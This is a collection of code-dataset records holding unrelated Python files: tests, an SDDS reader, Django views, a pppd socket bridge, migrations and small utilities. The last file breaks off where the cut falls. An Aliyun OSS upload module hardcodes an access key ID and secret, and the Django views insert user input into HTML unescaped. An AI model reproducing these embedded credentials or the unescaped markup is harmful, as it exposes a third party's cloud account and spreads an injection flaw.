np.set_printoptions(threshold='nan')\n def setUp(self):\n self.settings = ExperimentSettings()\n\n self.lp = LightPulse(self.settings)\n\n def test__run_thread(self, mock_waveform_thread):\n\n mock_waveform_thread.return_value.time = 3\n mock_waveform_thread.return_value.Read_Data = np.array([])\n\n handler = MeasurementHandler()\n handler.add_to_queue(self.lp.create_waveform(), self.settings)\n # handler._run_thread()\n\n def test_single_measurement_no_averaging(self, mock_waveform_thread):\n\n handler = MeasurementHandler()\n handler.add_to_queue(self.lp.create_waveform(), self.settings)\n return_tuple = (np.array([1, 2, 3, 4, 5, 6]), np.array([0, 1]))\n\n with patch.object(handler, '_run_thread',\n return_value=return_tuple) as method:\n test_dataset = handler.single_measurement()\n self.assertEqual(1, method.call_count)\n np.testing.assert_array_equal(\n test_dataset,\n np.array([[0, 1, 3, 5], [1, 2, 4, 6]])\n )\n\n self.assertEqual(len(handler._queue), 0)\n\n def test_single_measurement_with_averaging(self, mock_waveform_thread):\n # setup\n settings = ExperimentSettings()\n settings.averaging = 2\n handler = MeasurementHandler()\n return_tuple = [\n (np.array([2, 3, 4, 5, 6, 7]), np.array([0, 1])),\n (np.array([3, 4, 5, 6, 7, 8]), np.array([0, 1])),\n ]\n\n handler.add_to_queue(self.lp.create_waveform(), settings)\n\n with patch.object(handler, '_run_thread', side_effect=return_tuple) as method:\n # perform\n test_dataset = handler.single_measurement()\n\n # assert\n self.assertEqual(2, method.call_count)\n np.testing.assert_array_equal(\n test_dataset,\n np.array([[0, 2.5, 4.5, 6.5], [1, 3.5, 5.5, 7.5]])\n )\n\n self.assertEqual(len(handler._queue), 0)\n\n\n def test_add_to_queue(self, mock_waveform_thread):\n handler = MeasurementHandler()\n handler.add_to_queue(self.lp.create_waveform(), self.settings)\n self.assertEqual(len(handler._queue), 1)\n\n @log_capture()\n def test_series_measurement_empty_queue(self, mock_waveform_thread,\n log_checker):\n\n handler = MeasurementHandler()\n\n observed_data_list = handler.series_measurement()\n self.assertEqual(\n len(observed_data_list), 0)\n\n log_checker.check(\n ('root', 'INFO', 'Total: 0 measurements performed'),\n )\n\n @log_capture()\n def test_series_measurement_one_in_queue(self, mock_waveform_thread,\n log_checker):\n\n # setup\n handler = MeasurementHandler()\n print(handler._queue)\n\n handler.add_to_queue(self.lp.create_waveform(), self.settings)\n side_effect_array = [\n np.array([[0, 2.5, 4.5, 6.5], [1, 3.5, 5.5, 7.5]])\n ]\n\n with patch.object(handler, 'single_measurement',\n side_effect=side_effect_array) as method:\n # perform\n observed_data_list = handler.series_measurement()\n\n # assert\n for observed_data in observed_data_list:\n np.testing.assert_array_equal(\n observed_data,\n np.array([[0, 2.5, 4.5, 6.5], [1, 3.5, 5.5, 7.5]])\n )\n\n log_checker.check(\n ('root', 'INFO', 'Measurement #1 complete'),\n ('root', 'INFO', 'Total: 1 measurements performed'),\n )\n\n @log_capture()\n def test_series_measurement_multiple_queue(self, mock_waveform_thread,\n log_checker):\n\n side_effect_array = [\n np.array([[0, 2.5, 4.5, 6.5], [1, 3.5, 5.5, 7.5]]),\n np.array([[0, 2.5, 4.5, 6.5], [1, 3.5, 5.5, 7.5]]),\n np.array([[0, 2.5, 4.5, 6.5], [1, 3.5, 5.5, 7.5]])\n ]\n\n handler = MeasurementHandler()\n\n handler.add_to_queue(self.lp.create_waveform(), self.settings)\n handler.add_to_queue(self.lp.create_waveform(), self.settings)\n handler.add_to_queue(self.lp.create_waveform(), self.settings)\n\n with patch.object(handler, 'single_measurement',\n side_effect=side_effect_array) as method:\n observed_data_list = handler.series_measurement()\n\n for observed_data in observed_data_list:\n np.testing.assert_array_equal(\n observed_data,\n np.array([[0, 2.5, 4.5, 6.5], [1, 3.5, 5.5, 7.5]])\n )\n log_checker.check(\n ('root', 'INFO', 'Measurement #1 complete'),\n ('root', 'INFO', 'Measurement #2 complete'),\n ('root', 'INFO', 'Measurement #3 complete'),\n ('root', 'INFO', 'Total: 3 measurements performed'),\n )\n","sub_path":"pvapp/test/test_measurement_handler.py","file_name":"test_measurement_handler.py","file_ext":"py","file_size_in_byte":5336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"598300221","text":"# -*- coding: utf-8 -*-\r\nimport base64\r\nj =str.encode(\"[11]:data:image/png;base64,\")\r\ni = r'Snipaste_2021-06-28_17-21-49.png'\r\nf=open(i,'rb') #二进制方式打开图文件\r\nls_f=base64.b64encode(f.read()) #读取文���内容,转换为base64编码\r\nf.close()\r\nwith open('E:/脚本/bs4_png.txt','wb') as e:\r\n e.write(j)\r\n e.write(ls_f)\r\n ","sub_path":"png.py","file_name":"png.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"296157437","text":"# -*- coding: utf-8 -*-\nimport base64\nimport os\nimport re\n\nimport oss2\n\n# 首先初始化AccessKeyId、AccessKeySecret、Endpoint等信息。\n# 通过环境变量获取,或者把诸如“<你的AccessKeyId>”替换成真实的AccessKeyId等。\naccess_key_id = os.getenv('OSS_TEST_ACCESS_KEY_ID', 'LTAI4FkXV5WzzQiVx6Jj8Lna')\naccess_key_secret = os.getenv('OSS_TEST_ACCESS_KEY_SECRET', '2iw8aulSCNJovwpLIMQ8VM8JUk8Uci')\nbucket_name = os.getenv('OSS_TEST_BUCKET', 'ynd-picture')\nendpoint = os.getenv('OSS_TEST_ENDPOINT', 'oss-cn-beijing.aliyuncs.com')\n\n# 确认上面的参数都填写正确了\nfor param in (access_key_id, access_key_secret, bucket_name, endpoint):\n assert '<' not in param, '请设置参数:' + param\n\n# 创建Bucket对象,所有Object相关的接口都可以通过Bucket对象来进行\nbucket = oss2.Bucket(oss2.Auth(access_key_id, access_key_secret), endpoint, bucket_name)\n\n\n# 用户上传头像,username=登录用户名,img为base64格式的字符串\ndef userfile_upload(username, img):\n # 转换为图片\n a = re.search(r'data:.+base64,', img)\n img = img.replace(a.group(), \"\")\n userimg = base64.b64decode(img)\n # 括号内左边为上传的文件名存储名称,右边为上传的图片\n res = bucket.put_object(username + '.jpg', userimg)\n if res.status == 200:\n url = \"https://ynd-picture.oss-cn-beijing.aliyuncs.com/\" + username + '.jpg'\n # 返回user头像的路径\n return url\n else:\n return False\n\n\n# 删除用户头像,username=登录用户名\ndef delete_userimg(username):\n bucket.delete_object(username + '.jpg')\n return \"头像删除成功\"\n\n","sub_path":"common/userimg_upload.py","file_name":"userimg_upload.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"104322605","text":"from __future__ import annotations\n\nfrom typing import NamedTuple\n\nfrom settings import DEFAULT_PREFIX\n\n\nclass Command(NamedTuple):\n name: str\n raw_args: str\n args: list[str]\n\n @classmethod\n def from_str(cls, s: str, prefix: str = DEFAULT_PREFIX) -> 'Command':\n if not s.startswith(prefix):\n raise ValueError\n stripped = s.removeprefix(prefix)\n cmd_name, *raw_args = [part.strip() for part in stripped.split(' ', maxsplit=1)]\n _, *args = [part.strip() for part in stripped.split()]\n\n return Command(\n name=cmd_name,\n raw_args=''.join(raw_args),\n args=args,\n )\n\n @classmethod\n def dummy(cls) -> 'Command':\n return Command(\n name='привет',\n raw_args='',\n args=[],\n )\n","sub_path":"command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"515861365","text":"#!/usr/bin/env python3\n\nimport os, sys, time, subprocess, pty, fcntl, socket, select, argparse;\n\nparser = argparse.ArgumentParser();\nparser.add_argument(\n '--host',\n '-H',\n help='Specify binding host for the PPP server.',\n default=''\n);\nparser.add_argument(\n '--port',\n '-P',\n help='Specify port for the PPP server.',\n type=int,\n default=23\n);\nparser.add_argument('pppd_options', nargs=argparse.REMAINDER, help='Options for pppd');\nargs = parser.parse_args();\n\nclass Terminal:\n __closed=False;\n def __init__(self):\n global args;\n self.__master, self.__slave = pty.openpty();\n fcntl.fcntl(self.__master, fcntl.F_SETFL, fcntl.fcntl(self.__master, fcntl.F_GETFL) | os.O_NONBLOCK);\n ptyPath=\"/proc/\"+str(os.getpid())+'/fd/'+str(self.__slave);\n subprocess.Popen(['/usr/sbin/pppd', ptyPath]+args.pppd_options);\n\n def close(self):\n if self.__closed:\n return;\n os.close(self.__slave);\n os.close(self.__master);\n self.__closed=True;\n\n def read(self):\n try:\n return os.read(self.__master, 65536);\n except BlockingIOError:\n return b'';\n\n def write(self, data):\n os.write(self.__master, data);\n\ninputs = [];\noutputs = [];\nterms = {};\ntry:\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM);\n server.setblocking(0);\n server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1);\n server.bind((args.host, args.port));\n server.listen(5);\n inputs.append(server);\nexcept OSError as e:\n print(str(e));\n exit(1);\n\ndef closeConnection(socket):\n global inputs,outputs,terms;\n fileno=str(socket.fileno());\n if socket in inputs:\n inputs.remove(socket);\n if socket in outputs:\n outputs.remove(socket);\n if fileno in terms:\n terms.pop(fileno).close();\n socket.close();\n\ntry:\n while True:\n time.sleep(0.1);\n readable, writable, exceptional = select.select(inputs, outputs, inputs);\n for s in readable:\n if s is server:\n conn, addr = s.accept();\n conn.setblocking(0);\n inputs.append(conn);\n terms[str(conn.fileno())] = Terminal();\n else:\n try:\n terms[str(s.fileno())].write(s.recv(1024));\n if s not in outputs:\n outputs.append(s);\n except Exception as e:\n print(e);\n closeConnection(s);\n\n for s in writable:\n try:\n s.sendall(terms[str(s.fileno())].read());\n if s in outputs:\n outputs.remove(s);\n except Exception as e:\n print(e);\n closeConnection(s);\n\n for s in exceptional:\n closeConnection(s);\n\nexcept KeyboardInterrupt:\n pass;\nfinally:\n for key, term in terms.items():\n term.close();\n\n","sub_path":"misc/pppd.py","file_name":"pppd.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"61955024","text":"from django.template import RequestContext\nfrom django.shortcuts import render_to_response, render\nfrom django.http import HttpResponse, HttpResponseRedirect, HttpResponseNotFound\nfrom showParser.show import parser\n\nimport os, json\nimport showParser.forms as forms\n\nUSERNAME = os.environ['NETFLIX_USER']\nPASSWORD = os.environ['NETFLIX_PASS']\n\ndef index(request):\n\treturn render_to_response('index.html')\t\n\ndef add(request):\n\twith open('assets/showdata.json', 'r') as text_file:\n\t\tshows_data = json.load(text_file)\n\tshows = shows_data.keys()\n\tshows_list = '
'\n\tfor i in range(len(shows)):\n\t\tshows_list += ('
' + shows[i] + '
')\n\tshows_list += '
'\n\tif request.method == \"POST\":\n\t\tshow_form = forms.SPModelForm(request.POST)\n\t\tif 'add_show' in request.POST:\n\t\t\talert_bar = ''\n\t\t\tshow_form = forms.SPModelForm(request.POST)\n\t\t\tif show_form.is_valid():\n\t\t\t\tshowName = show_form.cleaned_data['show'] \n\t\t\t\tif showName not in shows:\n\t\t\t\t\tshow = parser(USERNAME, PASSWORD, showName)\n\t\t\t\t\texists = show.getSeasonLink()\n\t\t\t\t\tif exists:\n\t\t\t\t\t\tshow.getEpisodeLinks()\n\t\t\t\t\t\tshows_data[showName] = show.showContent\n\t\t\t\t\t\tnew_data = json.dumps(shows_data)\n\t\t\t\t\t\twith open('assets/showdata.json', 'w') as text_file:\n\t\t\t\t\t\t\ttext_file.write(new_data)\n\t\t\t\t\t\talert_bar += \"\"\"\n\t\t\t\t\t\t\t
\n\t\t\t\t\t\t\t\tShow Added! To watch a random show, please click on the \"Watch\" button!\n\t\t\t\t\t\t\t
\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\treturn render(request, 'add.html', {'form': show_form, 'alert_bar': alert_bar, 'shows_list': shows_list})\n\t\t\t\t\telse:\n\t\t\t\t\t\talert_bar += \"\"\"\n\t\t\t\t\t\t\t
\n\t\t\t\t\t\t\t\tShow Doesn't Exist! Please make sure to type in the show exactly as it appears on Netflix! Otherwise it cannot be added to this.\n\t\t\t\t\t\t\t
\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\treturn render(request, 'add.html', {'form': show_form, 'alert_bar': alert_bar, 'shows_list': shows_list})\n\n\t\t\t\telse:\n\t\t\t\t\talert_bar += \"\"\"\n\t\t\t\t\t\t
\n\t\t\t\t\t\t\tShow Already Exists! \"%s\" is already in the database. Just go select it from the \"Watch\" tab!\n\t\t\t\t\t\t
\n\t\t\t\t\t\"\"\" % (showName)\n\t\t\t\t\treturn render(request, 'add.html', {'form': show_form, 'alert_bar': alert_bar, 'shows_list': shows_list})\n\n\t\t\telse:\n\t\t\t\treturn error\n\t\telse:\n\t\t\tpass\n\telse:\n\t\tshow_form = forms.SPModelForm()\n\t\tresponse = render(request, 'add.html', {'form': show_form, 'alert_bar': '', 'shows_list': shows_list})\n\t\treturn response\n\ndef watch(request):\n\twith open('assets/showdata.json', 'r') as text_file:\n\t\tnetflixdata = text_file.read()\n\twith open('assets/showdata.json', 'r') as text_file:\n\t\tshowdata = json.load(text_file)\n\n\tif len(showdata.keys()) != 0:\n\t\tdropdownList = showdata.keys()\n\n\t\tshowsList = \"\"\n\t\tfor i in dropdownList:\n\t\t\tshowsList += '
  • %s
  • ' % (i, i)\n\n\t\tresponse = render(request, 'watch.html', {'showsList': showsList, 'proof': netflixdata})\n\t\treturn response\n\telse:\n\t\talert_bar = \"\"\"\n\t\t\t
    \n\t\t\t\tThere aren't any shows! You have no shows included in your file. Go add some!\n\t\t\t
    \n\t\t\"\"\"\n\t\treturn render(request, 'watch.html', {'alert_bar': alert_bar})\n\n\n\treturn render_to_response('watch.html')\n\ndef contact(request):\n\treturn render_to_response('contact.html')","sub_path":"showParser/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"285776983","text":"\"\"\"empty message\n\nRevision ID: aebca35c48ef\nRevises: 76359437b051\nCreate Date: 2019-12-28 16:41:57.942334\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'aebca35c48ef'\ndown_revision = '76359437b051'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('culture_reference',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('created', sa.DateTime(), nullable=True),\n sa.Column('modified', sa.DateTime(), nullable=True),\n sa.Column('reference_fk', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['reference_fk'], ['reference.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('event_reference',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('created', sa.DateTime(), nullable=True),\n sa.Column('modified', sa.DateTime(), nullable=True),\n sa.Column('reference_fk', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['reference_fk'], ['reference.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('event_reference')\n op.drop_table('culture_reference')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/aebca35c48ef_.py","file_name":"aebca35c48ef_.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"571125803","text":"# abs(Ai - (b - i )) + ... のmin\nN = int(input())\nA = list(map(int,input().split()))\nB = []\nfor i in range(len(A)):\n B.append(A[i] - (i + 1))\nB.sort()\n#print(B)\nif N % 2 == 1:\n b = B[N//2]\nelse:\n b = (B[N // 2] + B[N // 2 - 1]) // 2\n#print(b)\nsum_val = 0\nfor i in range(N):\n sum_val += abs(B[i] - b)\nprint(sum_val)","sub_path":"ABC/102/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"261983343","text":"class Solution(object):\n\n def container_with_most_water(self, heights):\n \"\"\"\n :param heights: List[int]\n :return: int\n \"\"\"\n left_pt = 0\n right_pt = len(heights)-1\n area = 0\n\n while left_pt < right_pt:\n min_height = min(heights[left_pt], heights[right_pt])\n area = max(area, min_height*(right_pt-left_pt))\n if heights[left_pt] < heights[right_pt]:\n left_pt += 1\n else:\n right_pt -= 1\n\n return area\n","sub_path":"all_problems/11. Container With Most Water/container_with_most_water.py","file_name":"container_with_most_water.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"126435373","text":"\"\"\"\nReader\n------\n\nThis module contains the reading functionality of ``sdds``.\nIt provides a high-level function to read SDDS files in different formats, and a series of helpers.\n\"\"\"\nimport pathlib\nimport struct\nimport sys\nfrom typing import IO, Any, List, Optional, Generator, Dict, Union, Tuple, Callable, Type\n\nimport numpy as np\n\nfrom sdds.classes import (SddsFile, Column, Parameter, Definition, Array, Data, Description,\n ENCODING, NUMTYPES_CAST, NUMTYPES_SIZES, get_dtype_str)\n\n\ndef read_sdds(file_path: Union[pathlib.Path, str], endianness: str = None) -> SddsFile:\n \"\"\"\n Reads SDDS file from the specified ``file_path``.\n\n Args:\n file_path (Union[pathlib.Path, str]): `Path` object to the input SDDS file. Can be a\n `string`, in which case it will be cast to a `Path` object.\n endianness (str): Endianness of the file. Either 'big' or 'little'.\n If not given, the endianness is either extracted from\n the comments in the header of the file (if present)\n or determined by the machine you are running on.\n Binary files written by this package are all big-endian,\n and contain a comment in the file.\n\n Returns:\n An `SddsFile` object containing the loaded data.\n \"\"\"\n file_path = pathlib.Path(file_path)\n with file_path.open(\"rb\") as inbytes:\n if endianness is None:\n endianness = _get_endianness(inbytes)\n version, definition_list, description, data = _read_header(inbytes)\n data_list = _read_data(data, definition_list, inbytes, endianness)\n\n return SddsFile(version, description, definition_list, data_list)\n\n\n##############################################################################\n# Common reading of header and data.\n##############################################################################\n\ndef _read_header(inbytes: IO[bytes]) -> Tuple[str, List[Definition], Optional[Description], Data]:\n word_gen = _gen_words(inbytes)\n version = next(word_gen) # First token is the SDDS version\n assert version == \"SDDS1\",\\\n \"This module is compatible with SDDS v1 only... are there really other versions?\"\n definitions: List[Definition] = []\n description: Optional[Description] = None\n data: Optional[Data] = None\n for word in word_gen:\n def_dict: Dict[str, str] = _get_def_as_dict(word_gen)\n if word in (Column.TAG, Parameter.TAG, Array.TAG):\n definitions.append({\n Column.TAG: Column,\n Parameter.TAG: Parameter,\n Array.TAG: Array}[word](name=def_dict.pop(\"name\"),\n type=def_dict.pop(\"type\"),\n **def_dict))\n continue\n if word == Description.TAG:\n if description is not None:\n raise ValueError(\"Two &description tags found.\")\n description = Description(**def_dict)\n continue\n if word == \"&include\":\n # TODO: This should be easy but I will not support it for now.\n raise NotImplementedError\n if word == Data.TAG:\n data = Data(mode=def_dict.pop(\"mode\"))\n break\n raise ValueError(f\"Unknown token: {word} encountered.\")\n if data is None:\n raise ValueError(\"Found end of file while looking for &data tag.\")\n definitions = _sort_definitions(definitions)\n return version, definitions, description, data\n\n\ndef _sort_definitions(orig_defs: List[Definition]) -> List[Definition]:\n \"\"\"\n Sorts the definitions in the parameter, array, column order.\n According to the specification, parameters appear first in data pages then arrays\n and then columns. Inside each group they follow the order of appearance in the header.\n \"\"\"\n definitions: List[Definition] = [definition for definition in orig_defs\n if isinstance(definition, Parameter)]\n definitions.extend([definition for definition in orig_defs if isinstance(definition, Array)])\n definitions.extend([definition for definition in orig_defs if isinstance(definition, Column)])\n return definitions\n\n\ndef _read_data(data: Data, definitions: List[Definition], inbytes: IO[bytes], endianness: str) -> List[Any]:\n if data.mode == \"binary\":\n return _read_data_binary(definitions, inbytes, endianness)\n elif data.mode == \"ascii\":\n return _read_data_ascii(definitions, inbytes)\n\n raise ValueError(f\"Unsupported data mode {data.mode}.\")\n\n\n##############################################################################\n# Binary data reading\n##############################################################################\n\ndef _read_data_binary(definitions: List[Definition], inbytes: IO[bytes], endianness: str) -> List[Any]:\n row_count: int = _read_bin_int(inbytes, endianness) # First int in bin data\n functs_dict: Dict[Type[Definition], Callable] = {\n Parameter: _read_bin_param,\n Column: lambda x, y, z: _read_bin_column(x, y, z, row_count),\n Array: _read_bin_array\n }\n return [functs_dict[definition.__class__](inbytes, definition, endianness) for definition in definitions]\n\n\ndef _read_bin_param(inbytes: IO[bytes], definition: Parameter, endianness: str) -> Union[int, float, str]:\n try:\n if definition.fixed_value is not None:\n if definition.type == \"string\":\n return definition.fixed_value\n return NUMTYPES_CAST[definition.type](definition.fixed_value)\n except AttributeError:\n pass\n if definition.type == \"string\":\n str_len: int = _read_bin_int(inbytes, endianness)\n return _read_string(inbytes, str_len, endianness)\n return NUMTYPES_CAST[definition.type](\n _read_bin_numeric(inbytes, definition.type, 1, endianness)\n )\n\n\ndef _read_bin_column(inbytes: IO[bytes], definition: Column, endianness: str, row_count: int):\n # TODO: This columns things might be interesting to implement.\n raise NotImplementedError(\"\")\n\n\ndef _read_bin_array(inbytes: IO[bytes], definition: Array, endianness: str) -> Any:\n dims, total_len = _read_bin_array_len(inbytes, definition.dimensions, endianness)\n\n if definition.type == \"string\":\n len_type = {\"u1\": \"char\", \"i2\": \"short\"}.get(\n getattr(definition, \"modifier\", None), \"long\"\n )\n str_array = []\n for _ in range(total_len):\n str_len = int(_read_bin_numeric(inbytes, len_type, 1, endianness))\n str_array.append(_read_string(inbytes, str_len, endianness))\n return str_array\n\n data = _read_bin_numeric(inbytes, definition.type, total_len, endianness)\n return data.reshape(dims)\n\n\ndef _read_bin_array_len(inbytes: IO[bytes], num_dims: Optional[int], endianness: str) -> Tuple[List[int], int]:\n if num_dims is None:\n num_dims = 1\n\n dims = [_read_bin_int(inbytes, endianness) for _ in range(num_dims)]\n return dims, int(np.prod(dims))\n\n\ndef _read_bin_numeric(inbytes: IO[bytes], type_: str, count: int, endianness: str) -> Any:\n return np.frombuffer(inbytes.read(count * NUMTYPES_SIZES[type_]),\n dtype=np.dtype(get_dtype_str(type_, endianness)))\n\n\ndef _read_bin_int(inbytes: IO[bytes], endianness: str) -> int:\n return int(_read_bin_numeric(inbytes, \"long\", 1, endianness))\n\n\ndef _read_string(inbytes: IO[bytes], str_len: int, endianness: str) -> str:\n str_dtype = get_dtype_str(\"string\", endianness, length=str_len)\n packed_str = inbytes.read(str_len)\n return struct.unpack(str_dtype, packed_str)[0].decode(ENCODING)\n\n\n##############################################################################\n# ASCII data reading\n##############################################################################\n\ndef _read_data_ascii(definitions: List[Definition], inbytes: IO[bytes]) -> List[Any]:\n def _ascii_generator(ascii_text):\n for line in ascii_text:\n yield line\n\n # Convert bytes to ASCII, separate by lines and remove comments\n ascii_text = [chr(r) for r in inbytes.read()]\n ascii_text = ''.join(ascii_text).split('\\n')\n ascii_text = [line for line in ascii_text if not line.startswith('!')]\n\n # Get the generator for the text\n ascii_gen = _ascii_generator(ascii_text)\n\n # Dict of function to call for each type of tag: array, parameter\n functs_dict = {Parameter: _read_ascii_parameter,\n Array: _read_ascii_array\n }\n\n # Iterate through every parameters and arrays in the file\n data = []\n for definition in definitions:\n def_tag = definition.__class__\n\n # Call the function handling the tag we're on\n # Change the current line according to the tag and dimensions\n value = functs_dict[def_tag](ascii_gen, definition)\n data.append(value)\n\n return data\n\n\ndef _read_ascii_parameter(ascii_gen: Generator[str, None, None],\n definition: Parameter) -> Union[str, int, float]:\n\n # Check if we got fixed values, no need to read a line if that's the case\n if definition.fixed_value is not None:\n if definition.type == \"string\":\n return definition.fixed_value\n if definition.type in NUMTYPES_CAST:\n return NUMTYPES_CAST[definition.type](definition.fixed_value)\n\n # No fixed value -> read a line\n # Strings can be returned without cast\n if definition.type == \"string\":\n return next(ascii_gen)\n\n # For other types, a cast is needed\n if definition.type in NUMTYPES_CAST:\n return NUMTYPES_CAST[definition.type](next(ascii_gen))\n\n raise TypeError(f\"Type {definition.type} for Parameter unsupported\")\n\n\ndef _read_ascii_array(ascii_gen: Generator[str, None, None],\n definition: Array) -> np.ndarray:\n\n # Get the number of elements per dimension\n dimensions = next(ascii_gen).split()\n dimensions = np.array(dimensions, dtype=\"int\")\n\n # Get all the data given by the dimensions\n data = []\n while len(data) != np.prod(dimensions):\n # The values on each line are split by a space\n data += next(ascii_gen).strip().split(' ')\n\n # Cast every object to the correct type\n if definition.type != 'string':\n data = list(map(NUMTYPES_CAST[definition.type], data))\n\n # Convert to np.array so that it can be reshaped to reflect the dimensions\n data = np.array(data)\n data = data.reshape(dimensions)\n\n return data\n\n\n##############################################################################\n# Helper generators to consume the input bytes\n##############################################################################\n\ndef _get_endianness(inbytes: IO[bytes]) -> str:\n \"\"\"Tries to determine endianness from file-comments.\n If nothing found, uses machine endianness.\"\"\"\n endianness = sys.byteorder\n while True:\n line = inbytes.readline().decode(ENCODING)\n if not line:\n break # break at beginning of binary part\n if line.strip() == \"!# big-endian\":\n endianness = \"big\"\n break\n if line.strip() == \"!# little-endian\":\n endianness = \"little\"\n break\n inbytes.seek(0) # return back to beginning of file\n return endianness\n\n\ndef _gen_real_lines(inbytes: IO[bytes]) -> Generator[str, None, None]:\n \"\"\"No comments and stripped lines.\"\"\"\n while True:\n line = inbytes.readline().decode(ENCODING)\n if not line:\n return\n if line != \"\\n\" and not line.strip().startswith(\"!\"):\n yield line.strip()\n\n\ndef _gen_words(inbytes: IO[bytes]) -> Generator[str, None, None]:\n for line in _gen_real_lines(inbytes):\n for word in line.split():\n yield word\n return\n\n\ndef _get_def_as_dict(word_gen: Generator[str, None, None]) -> Dict[str, str]:\n raw_str: List[str] = []\n for word in word_gen:\n if word.strip() == \"&end\":\n recomposed: str = \" \".join(raw_str)\n parts = [assign for assign in recomposed.split(\",\") if assign]\n return {key.strip(): value.strip() for (key, value) in\n [assign.split(\"=\") for assign in parts]}\n raw_str.append(word.strip())\n raise ValueError(\"EOF found while looking for &end tag.\")\n","sub_path":"sdds/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":12389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"248786951","text":"# ms_mint/helpers.py\n\nimport os\n\ndef dataframe_difference(df1, df2, which=None):\n \"\"\"Find rows which are different between two DataFrames.\"\"\"\n comparison_df = df1.merge(df2,\n indicator=True,\n how='outer')\n if which is None:\n diff_df = comparison_df[comparison_df['_merge'] != 'both']\n else:\n diff_df = comparison_df[comparison_df['_merge'] == which]\n return diff_df\n\n\ndef sort_columns_by_median(df):\n cols = df.median().sort_values(ascending=False).index\n return df[cols]\n\n\ndef remove_all_zero_columns(df):\n is_zero = df.max() != 0\n is_zero = is_zero[is_zero].index\n return df[is_zero]\n\n\ndef is_ms_file(fn):\n if (fn.lower().endswith('.mzxml')) or \\\n (fn.lower().endswith('.mzml')) or \\\n (fn.lower().endswith('.mzhdf')) or \\\n (fn.lower().endswith('.feather')):\n return True\n else:\n return False\n\ndef get_ms_files_from_results(results):\n ms_files = results[['ms_path', 'ms_file']].drop_duplicates()\n ms_files = [os.path.join(ms_path, ms_file) for ms_path, ms_file in ms_files.values]\n return ms_files","sub_path":"ms_mint/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"375344962","text":"'''\nCreate toy data\n\n'''\nimport time\nimport numpy as np\nimport pandas as pd\nfrom scipy.stats import rv_discrete\nimport matplotlib.pyplot as plt\nimport argparse\nimport os\nfrom sklearn.model_selection import train_test_split\n\ndef draw_from_discrete_pmf(states, p, duration):\n ''' Sample from a discrete probability mass function\n\n Args\n ------\n states : list\n List of states\n p : tuple\n Probabilities for each state\n duration : int\n Duration or \"dwell time\" of this state\n \n Returns\n -------\n samples : 1D array, size (duration,)\n Each entry is an integer indicator drawn from discrete pmf\n '''\n drawn_state = np.zeros(duration)\n drawn_state[:] = rv_discrete(name='custm', values=(states, p)).rvs(size=1)\n return drawn_state\n\ndef generate_state_sequence(T, states, init_proba_K, trans_proba_KK, duration = 2): \n ''' Generate hidden state assignments following a semi-Markov model\n\n Args\n ------ \n T : length of time series (scalar) \n init_proba_K : tuple of initial probabilities\n states : list of states\n \n Returns\n -------\n T x 1 samples drawn from the Markov model\n '''\n # define some initial probabilities of each state\n init_state = draw_from_discrete_pmf(states, init_proba_K, duration)\n\n # draw T samples from the above model\n drawn_states = []\n \n # draw T samples from the above model\n while len(drawn_states)<=T:\n if len(drawn_states)==0:\n drawn_states.extend(init_state)\n else:\n z_prev = drawn_states[-1]\n drawn_states.extend(draw_from_discrete_pmf(states, trans_proba_KK[int(z_prev)], duration))\n\n drawn_states = np.asarray(drawn_states[:T])\n \n return drawn_states\n\ndef generate_data_sequences_given_state_sequences(\n state_sequences_TN, possible_states, mean_KD, stddev_KD):\n ''' Generate data given states\n\n Returns\n ------\n data_DTN : 3d array, (n_dims, n_timessteps, n_sequences)\n Contains observed features for each timestep\n Any timestep with missing data will be assigned nan\n '''\n K, D = mean_KD.shape\n T, N = state_sequences_TN.shape\n data_DTN = np.nan + np.zeros((D, T, N))\n y_N = np.zeros(N)\n \n for n in range(N):\n for state in possible_states:\n cur_bin_mask_T = state_sequences_TN[:,n] == state\n C = np.sum(cur_bin_mask_T)\n \n data_DTN[:, cur_bin_mask_T, n] = np.random.normal(mean_KD[state], stddev_KD[state], size=C).T\n \n if (state == 2)&(C>0):\n y_N[n]=1\n \n return data_DTN, y_N\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n 